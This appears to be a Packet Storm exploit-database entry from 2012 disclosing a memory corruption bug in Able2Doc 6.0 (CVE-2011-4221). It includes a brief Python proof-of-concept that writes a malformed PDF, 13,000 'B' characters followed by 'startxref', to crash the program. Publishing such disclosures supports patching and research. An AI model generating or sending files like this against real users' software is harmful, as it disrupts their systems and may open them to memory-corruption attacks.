Lucene search

K
packetstormCarlos Mario Penagos HollmannPACKETSTORM:114154
HistoryJun 25, 2012 - 12:00 a.m.

Able2Doc / Able2Doc Professional 6.0 Memory Corruption

2012-06-2500:00:00
Carlos Mario Penagos Hollmann
packetstormsecurity.com
26

0.007 Low

EPSS

Percentile

79.9%

`# Exploit Title: Able2Doc and Able2Doc Professional v 6.0 memory corruption  
# Date: June 24 2012  
# Exploit Author: Carlos Mario Penagos Hollmann  
# Vendor Homepage: www.investintech.com  
# Version:6.0  
# Tested on: Windows 7  
# CVE : cve-2011-4221  
  
  
payload ="B"*13000  
crash="startxref"  
pdf=payload+crash  
  
filename = "slimpdPoC.pdf"  
file = open(filename,"w")  
file.writelines(pdf)  
file.close()  
  
`

0.007 Low

EPSS

Percentile

79.9%